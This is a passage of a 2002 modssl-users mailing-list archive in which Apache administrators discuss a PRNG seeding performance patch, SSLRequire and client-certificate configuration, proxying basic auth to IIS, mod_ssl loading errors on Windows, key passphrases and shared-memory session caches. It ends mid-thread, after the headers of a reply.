X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Date: Tue, 14 May 2002 16:35:04 +0100
Message-ID: <9CC75308C175544A96639D81CF07B1230566F8@Aep-Mail.aep-net.com>
Thread-Topic: prng seeding in mod_ssl 2.8.6
Thread-Index: AcH4aoQdTZbjSTnJQAecdKdXI01vKAC8lx+Q
From: "Noel O'Kelly" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Noel O'Kelly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C1FB5C.EB3536D9
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Thanks Joe


Noel O'Kelly

-----Original Message-----
From: Joe Orton [mailto:jorton@redhat.com]
Sent: 10 May 2002 22:29
To: Noel O'Kelly
Cc: modssl-users@modssl.org
Subject: Re: prng seeding in mod_ssl 2.8.6


On Fri, May 10, 2002 at 05:51:04PM +0100, Noel O'Kelly wrote:
> We have a report of a  problem from 2.8.6 onwards due to a change in
the
> seeding of the PRNG which halves the=20
> performance of SSL requests. Any update on this ???

Hi, here's the fix we're using...

Submitted by: Nalin Dahyabhai 

--- mod_ssl/pkg.sslmod/ssl_engine_rand.c
+++ mod_ssl/pkg.sslmod/ssl_engine_rand.c
@@ -156,6 +156,9 @@
                  */
                 if (ap_scoreboard_image !=3D NULL && SCOREBOARD_SIZE >
16) {
                     m =3D ((SCOREBOARD_SIZE / 2) - 1);
+                    if (m > 1024) {
+                        m =3D 1024;
+                    }
                     n =3D ssl_rand_choosenum(0, m);
                     RAND_seed(((unsigned char *)ap_scoreboard_image)+n,
m);
                     nDone +=3D m;

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


Accelerated Encryption Processing Ltd.

Bray Business Park,
Southern Cross Route ,
Bray, Co Wicklow,
Ireland

********************************************************************
This email and any files transmitted with it are confidential=20
and intended solely for the use of the individual or entity to
whom they are addressed. If you have received this email
 in error please notify the postmaster at the address below.

     postmaster@aep.ie

This footnote also confirms that this email message has been
checked the presence of computer viruses.

**********************************************************************


------_=_NextPart_001_01C1FB5C.EB3536D9
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






RE: prng seeding in mod_ssl 2.8.6





Thanks Joe






Noel O'Kelly




-----Original Message-----


From: Joe Orton [ma=
ilto:jorton@redhat.com]


Sent: 10 May 2002 22:29


To: Noel O'Kelly


Cc: modssl-users@modssl.org


Subject: Re: prng seeding in mod_ssl 2.8.6






On Fri, May 10, 2002 at 05:51:04PM +0100, Noel O'Kelly wr=
ote:


> We have a report of a  problem from 2.8.6 onwa=
rds due to a change in the


> seeding of the PRNG which halves the 


> performance of SSL requests. Any update on this ???=





Hi, here's the fix we're using...




Submitted by: Nalin Dahyabhai <nalin@redhat.com>




--- mod_ssl/pkg.sslmod/ssl_engine_rand.c


+++ mod_ssl/pkg.sslmod/ssl_engine_rand.c


@@ -156,6 +156,9 @@


         &n=
bsp;        */


         &n=
bsp;       if (ap_scoreboard_image !=3D NULL =
&& SCOREBOARD_SIZE > 16) {


         &n=
bsp;           m =3D ((SC=
OREBOARD_SIZE / 2) - 1);


+         &=
nbsp;          if (m > 1024=
) {


+         &=
nbsp;           &nbs=
p;  m =3D 1024;


+         &=
nbsp;          }


         &n=
bsp;           n =3D ssl_=
rand_choosenum(0, m);


         &n=
bsp;           RAND_seed(=
((unsigned char *)ap_scoreboard_image)+n, m);


         &n=
bsp;           nDone +=3D=
 m;




_________________________________________________________=
_____________


Apache Interface to OpenSSL (mod_ssl)   &=
nbsp;           &nbs=
p;   www.modssl.org


User Support Mailing List     &=
nbsp;           &nbs=
p;    modssl-users@modssl.org


Automated List Manager     &nbs=
p;            &=
nbsp;         majordomo@modssl.org<=
/FONT>







Accelerated Encryption Processing Ltd.



Bray Business Park,

Southern Cross Route ,

Bray, Co Wicklow,

Ireland



********************************************************************

This email and any files transmitted with it are confidential 

and intended solely for the use of the individual or entity to

whom they are addressed. If you have received this email

 in error please notify the postmaster at the address below.



     postmaster@aep.ie



This footnote also confirms that this email message has been

checked the presence of computer viruses.



**********************************************************************




------_=_NextPart_001_01C1FB5C.EB3536D9--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 18:43:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA25728; Tue, 14 May 2002 18:23:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id SAA25334; Tue, 14 May 2002 18:21:23 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA14143
	for ; Tue, 14 May 2002 12:22:09 -0400
Date: Tue, 14 May 2002 12:22:09 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Server private key
In-Reply-To: <3CE12900.D72E55BE@ruth.upc.es>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


not if the ley is properly protected as it should be.

On Tue, 14 May 2002, Rafael Amer wrote:

> Hi.
> 
> Does anyboy know if it is possible to access the RSA private key of an
> Apache server
> with mod_ssl from another module written in C or Perl (mod_perl)?
> 
> Thanks.
> 
> Regards,
> R. Amer
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 20:44:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12464; Tue, 14 May 2002 20:43:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA12405; Tue, 14 May 2002 20:43:18 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6A1434CE76D; Tue, 14 May 2002 20:43:16 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4EIZ8710804; Tue, 14 May 2002 20:35:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.ecm.qual-pro.com id TAA06154; Tue, 14 May 2002 19:46:19 +0200 (MET DST)
Received: from ms.ecm.qual-pro.com (root@ms.ecm.qual-pro.com [192.168.1.1])
	by mail.ecm.qual-pro.com (8.12.1/8.12.1) with ESMTP id g4EHU1AE031083
	for ; Tue, 14 May 2002 10:30:01 -0700
Received: from yokneam (yokneam.ecm.qual-pro.com [192.168.1.3])
	by ms.ecm.qual-pro.com (8.8.5/8.8.5) with SMTP id KAA31501
	for ; Tue, 14 May 2002 10:27:13 -0700
Received: by localhost with Microsoft MAPI; Tue, 14 May 2002 10:27:11 -0700
Message-ID: <01C1FB31.E8B3C7B0.dshane@qual-pro.com>
From: Darrell Shane 
To: "'modssl-users@modssl.org'" 
Subject: Questions about accessing user defined OIDs in an SSLRequire directive
Date: Tue, 14 May 2002 10:27:10 -0700
Organization: Qual-Pro Corporation
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Darrell Shane 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I defined two new OIDs:
	login=1.2.3.4.1
	hostAddress=1.2.3.4.3
When a client certificate is requested, login is set to the user's login 
name and the hostAddress is set to the host's IP address.  When the client 
attempts to access a restricted area of our site, his/her cert is required. 
 How can I check the value of login against the REMOTE_USER and the 
hostAddress against REMOTE_ADDRESS?  I was hoping the SSLRequire directive 
could retrieve user defined OID values, but I don't know how compose the 
expression.

Another idea I had was to test the values of the user defined OIDs listed 
in the client cert's DN via the SSL-related variable, SSL_CLIENT_S_DN. 
 However, I don't know how to retrieve the value of a variable within a 
regular expression.  For example, if the syntax for retrieving a variable's 
value within a regular expression were the same syntax used to retrieve a 
variable's value within an SSLRequire expression, then the following 
directive would suffice.
	SSLRequire	( %{SSL_CLIENT_S_DN} =~ m/\/login=${REMOTE_USER}/  and
			 %{SSL_CLIENT_S_DN} =~ m/\/hostAddress=${REMOTE_ADDRESS}/ )
By the way, httpd.conf complains about an escaped slash (\/) within the 
regular expression.

Is what I want to do possible and if so how?

Thank you,
Darrell
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 14 20:46:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12646; Tue, 14 May 2002 20:45:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA12552; Tue, 14 May 2002 20:44:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 16B214CE769; Tue, 14 May 2002 20:44:50 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4EIhXU10875; Tue, 14 May 2002 20:43:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.ecm.qual-pro.com id TAA07434; Tue, 14 May 2002 19:56:45 +0200 (MET DST)
Received: from ms.ecm.qual-pro.com (root@ms.ecm.qual-pro.com [192.168.1.1])
	by mail.ecm.qual-pro.com (8.12.1/8.12.1) with ESMTP id g4EHudAC031281
	for ; Tue, 14 May 2002 10:56:39 -0700
Received: from yokneam (yokneam.ecm.qual-pro.com [192.168.1.3])
	by ms.ecm.qual-pro.com (8.8.5/8.8.5) with SMTP id KAA31633
	for ; Tue, 14 May 2002 10:53:42 -0700
Received: by localhost with Microsoft MAPI; Tue, 14 May 2002 10:53:42 -0700
Message-ID: <01C1FB35.9C8BA340.dshane@qual-pro.com>
From: Darrell Shane 
To: "'modssl-users@modssl.org'" 
Subject: How to restrict access to LAN clients or clients with valid certs?
Date: Tue, 14 May 2002 10:53:40 -0700
Organization: Qual-Pro Corporation
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Darrell Shane 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Our site has an area that I would like restrict access to either clients on 
our LAN or clients with a valid cert.   The following SSLRequire directive 
expresses what I would like:
	SSLRequire	( ${REMOTE_ADDRESS} =~ m/^192\.168\.1\.[0-9]+$/  or
			 ${SSL_CLIENT_I_DN} = ${SSL_SERVER_I_DN} )
The problem is that the client will not present his/her certificate unless 
the following SSLVerifyClient directive is used:
	SSLVerifyClient required
However, now clients on the LAN must also present a certificate (the 
"required" level must be used since "optional" does not work with Opera 
6.0).

Is there a way to restrict access to either clients with valid certs or LAN 
clients (such that LAN clients do not have to present a cert)?

Thank you,
Darrell
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 11:02:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13327; Wed, 15 May 2002 11:01:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA13305; Wed, 15 May 2002 11:00:58 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4F90Lv19443
	for ; Wed, 15 May 2002 09:00:42 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 15 May 2002 10:00:19 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067059@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: Proxying problem - a little off topic
Date: Wed, 15 May 2002 10:00:07 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I currently use basic auth over SSL to connect to our Intranet site
(https://iris.rnib.org.uk). This has worked fine for many years,  however,
we need to move to a new system that runs on IIS (stellent, formerly
xpedio), although some content will remain on Apache. 

To keep it under some kind of control, I'm only proxying certain extensions
as follows:

      RewriteEngine on
# 	Redirect home page
	RewriteRule  ^/$
http://dilbert/xpedio/groups/public/documents/iris/iriswelcome.hcsp [P,L]
#	Redirect hcsp,htm,css and js pages
	RewriteRule  ^/xpedio/(.*)\.hcsp(.*)$
http://dilbert/xpedio/$1.hcsp$2 [P,L]
	RewriteRule  ^/xpedio/(.*)\.htm(.*)$ http://dilbert/xpedio/$1.htm$2
[P,L]
      RewriteRule  ^/xpedio/(.*)\.css$   http://dilbert/xpedio/$1.css [P,L]
      RewriteRule  ^/xpedio/(.*)\.js$ http://dilbert/xpedio/$1.js [P,L]
#	Redirect images
	RewriteRule  ^/xpedio/(.*)\.gif$	http://dilbert/xpedio/$1.gif
[P,L]
	RewriteRule  ^/xpedio/(.*)\.jpg$	http://dilbert/xpedio/$1.jpg
[P,L]
	RewriteRule  ^/xpedio/(.*)\.png$	http://dilbert/xpedio/$1.png
[P,L]
#	Redirect one and only one cgi script!
	RewriteRule  ^/intradoc-cgi/idc_cgi_isapi.dll(.*)$
http://dilbert/intradoc-cgi/idc_cgi_isapi.dll$1 [P]

However, what happens is that the username and password to log into Apache
is passed to the ISAPI filter on the IIS box. This then sends its
authentication realm with it's request for the correct password. Unless the
username and password exists on both machines, you cannot access the content
externally. The Stellent system has a limit of 50 registered users, whereas
we have over 200 people who access our Intranet remotely.

I've been spending weeks reading through the mod_header, mod_proxy and
mod_rewrite documentation and I can't see any way to stop the username and
password being passed via mod_proxy. I've been testing it out as well.

I think this is something that Ralf might be able to answer as he wrote the
mod_rewrite module (great work Ralf). Of course, there may be others on this
list that have come across this problem before or are a bit brighter than me
(that wouldn't take much). It might mean that I have to use the Request
Header feature of Apache 2.0.

I say this is a little off topic, as it is really a problem with having to
use the evil IIS. Despite writing a paper six weeks before Code Red hit
saying that IIS is not safe to use, some people still insist on using it.

(Apologies for the bad word-wrapping).

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 16:53:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10051; Wed, 15 May 2002 16:52:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id QAA10040; Wed, 15 May 2002 16:51:53 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4FEpGv03927
	for ; Wed, 15 May 2002 14:51:36 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 15 May 2002 15:51:12 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F0206706B@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: Test message
Date: Wed, 15 May 2002 15:51:07 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The list has been quiet for nearly six hours. I'm getting concerned
(especially as I've not had a response to the last post).

Oh well, off to compile Apache 2.0 I go.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 19:01:47 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19265; Wed, 15 May 2002 19:00:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA19134; Wed, 15 May 2002 18:59:28 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E010C4CE74A; Wed, 15 May 2002 18:59:27 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4FGvhm29203; Wed, 15 May 2002 18:57:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id CAA10991; Wed, 15 May 2002 02:28:13 +0200 (MET DST)
Date: Wed, 15 May 2002 02:28:13 +0200 (MET DST)
Message-Id: <200205150028.CAA10991@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Dimitri Pochet
Version: Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip
OS: NT4 SP6a
Submission from: (NULL) (217.136.205.41)


Steps to reproduce: Installation of Apache, keys generation and installation of
modSSL, according to http://tud.at/programm/apache-ssl-win32-howto.php3
libeay.dll and ssleay.dll copied in winnt/system32. Earlier such files (from
teraterm ttssh) removed.
openssl.exe in the path (and runnable from any working dir).
httpd.conf was edited according to the install page above, including AddModule
and LoadModule.

Symptom :
Syntax error on line 173 of C:/Program Files/Apache
Group/Apache2/conf/httpd.conf:
Cannot load C:/Program Files/Apache Group/Apache2/modules/mod_ssl.so into
server: The specified module could not be found.

log levels set to debug.

Error logs:
Nothing in event DB
Nothing in error.log (except half a timestamp)
Nothing in access.log except my successful attempts on port 80
No ssl.log has been created

Tried to use a strace on apache.exe, no success.
Then, tried using earlier versions of apache+modssl, same error.
Unfortunately I do not know C, otherwise I would have tried adding debug info
from the .so.
Given up, tima beg for help.

Question:
appart solving this problem which looks uneasy when I see the unanswered rfh on
the web, is there a way to activate some debug on loading of dso modules ?
what about the new apache versions ? any intention to follow them up ?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 19:02:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19296; Wed, 15 May 2002 19:01:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA19136; Wed, 15 May 2002 18:59:29 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EE8964CE75F; Wed, 15 May 2002 18:59:27 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4FGwnN29237; Wed, 15 May 2002 18:58:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lsa-st2.lsa-net.de id NAA26883; Wed, 15 May 2002 13:43:42 +0200 (MET DST)
Received: from Bastion-Hal-In.lsa-net.de (lsa-st200.sachsen-anhalt.de [164.133.154.130])
	by lsa-st2.lsa-net.de (8.9.3/8.9.3) with ESMTP id NAA01381;
	Wed, 15 May 2002 13:43:57 +0200
Received: (from root@localhost)
          by Bastion-Hal-In.lsa-net.de (8.9.1/8.8.4)
	  id NAA19127; Wed, 15 May 2002 13:43:20 +0200
Received: from lsa-serv.lsa-net.de by KryptoWall via smtpp (Version 1.2.0) id kwa18791; Wed May 15 13:43:04 2002
Received: from lrpc4.lrz.mi.lsa-net.de (lrpc4.lrz.mi.lsa-net.de [164.133.96.139])
	by lsa-serv.lsa-net.de (8.11.2/8.8.6) with ESMTP id g4FBhLV10436;
	Wed, 15 May 2002 13:43:21 +0200
Received: from lrz.mi.lsa-net.de (lrpc13.lrz.mi.lsa-net.de [164.133.96.132])
	by lrpc4.lrz.mi.lsa-net.de (8.12.1/8.12.1) with ESMTP id g4FBhLvd005401;
	Wed, 15 May 2002 13:43:21 +0200
Message-ID: <3CE249D9.AD02A95D@lrz.mi.lsa-net.de>
Date: Wed, 15 May 2002 13:43:21 +0200
From: Robert Hannemann 
X-Mailer: Mozilla 4.78 [de] (WinNT; U)
X-Accept-Language: de
MIME-Version: 1.0
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: SSL Server Certificate
Content-Type: text/plain; charset=iso-8859-1
X-Virus-Scanned: by amavisd-milter (http://amavis.org/
X-MIME-Autoconverted: from 8bit to quoted-printable by lsa-serv.lsa-net.de id g4FBhLV10436
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAB26901
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Hannemann 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,
i´ve generated a Web-Server Certificate split it into server.crt and
server.key and tried to
start apache with ssl, but got the error: invalid passphrase for the key

with the command: openssl rsa -noout -text -in server.key

and after typing in the passphrase ican see the key-content. After that
i removed the passphrase from the key with: openssl rsa -in server.key
-out keyout.key

changed the apache conf and now i can start apache with ssl.
the Versions are:  apache 1.3.24
                           modssl: 2.8.8
                            openssl:
Can anyone help me to use the protected key?

Regards,
Robert Hannemann
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 22:40:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05684; Wed, 15 May 2002 22:39:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hyperion.ebondtrade.com id WAA05584; Wed, 15 May 2002 22:38:17 +0200 (MET DST)
Received: from atm.ebondtrade.com ([192.168.30.1]) by
          hyperion.ebondtrade.com (Netscape Messaging Server 4.15) with
          ESMTP id GW66AC00.A0H for ; Wed, 15 May
          2002 13:30:12 -0700 
Message-Id: <5.1.0.14.0.20020515132839.00ad7098@mail.ebondtrade.com>
X-Sender: ted@mail.ebondtrade.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
X-Zantaz-Sequence: hyperion_11182001:230000
Date: Wed, 15 May 2002 13:42:35 -0700
To: modssl-users@modssl.org
From: "Ted Bannon" 
Subject: SSLSessionCache: shared memory cache not useable on this
  platform
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ted Bannon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I've been trying to make use of the SSLSessionCache shared memory option in 
my Apache config:

#SSLSessionCache        shmht:/data/home/apache/1.3.24/logs/ssl_scache(512000)
#SSLSessionCache        shmcb:/data/home/apache/1.3.24/logs/ssl_scache(512000)
SSLSessionCache         dbm:/data/home/apache/1.3.24/logs/ssl_scache
#SSLSessionCache 
shm:/data/home/apache/1.3.24/logs/ssl_gcache_data(512000)

Presently dbm is enabled because trying to use any of the other 3 shared 
memory options returns this error at startup:

SSLSessionCache: shared memory cache not useable on this platform

Here are some details:
Linux 2.4.18
Apache 1.3.24
mod_ssl-2.8.8-1.3.24
mm-1.1.3

Running /usr/src/mm-1.1.3/mm_test ends with "OK - ALL TESTS SUCCESSFULLY 
PASSED," so I'm assuming (incorrectly maybe) that shared memory can be used 
on this platform.

Here're the relevant parts of my master configuration script.  I just added 
the SSL_EXPERIMENTAL option as per Geoff's in-depth posting on making use 
of shmcb.  At any rate, I don't see anything wrong with this script, and 
everything builds fine as far as I can tell.  I've checked the modssl-users 
list archive, but nobody else seems to have posted with this question 
before.  All the version info is correct -- I don't have any stale source 
trees laying about:

function build_mm () {
   cd $SRC/mm-${MM_VERSION}
   ./configure --disable-shared
   make
}

function build_apache () {
   cd $SRC/mod_ssl-${MODSSL_VERSION}
   ./configure \
     --with-apache=$SRC/apache_${APACHE_VERSION} \
     --with-mm=$SRC/mm-${MM_VERSION} \
     --with-ssl=$SRC/openssl-${OPENSSL_VERSION} \
     --enable-shared=ssl
   cd ../apache_${APACHE_VERSION}
   env SSL_BASE=$SRC/openssl-${OPENSSL_VERSION} \
   ./configure \
     --prefix=$PREFIX \
     --with-perl=$PERL \
         --enable-module=most \
         --enable-shared=max \
         --enable-module=ssl \
         --disable-rule=SSL_COMPAT \
         --enable-rule=SSL_SDBM  \
         --enable-rule=SSL_EXPERIMENTAL
     make
}


Any help or suggestions on why I get this error would be appreciated!

Thanks in advance,

Ted

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 15 22:53:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA06434; Wed, 15 May 2002 22:52:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id WAA06385; Wed, 15 May 2002 22:51:10 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4FKoMh14373
	for ; Wed, 15 May 2002 16:50:22 -0400
Date: Wed, 15 May 2002 16:50:22 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: SSLSessionCache: shared memory cache not useable on this  platform
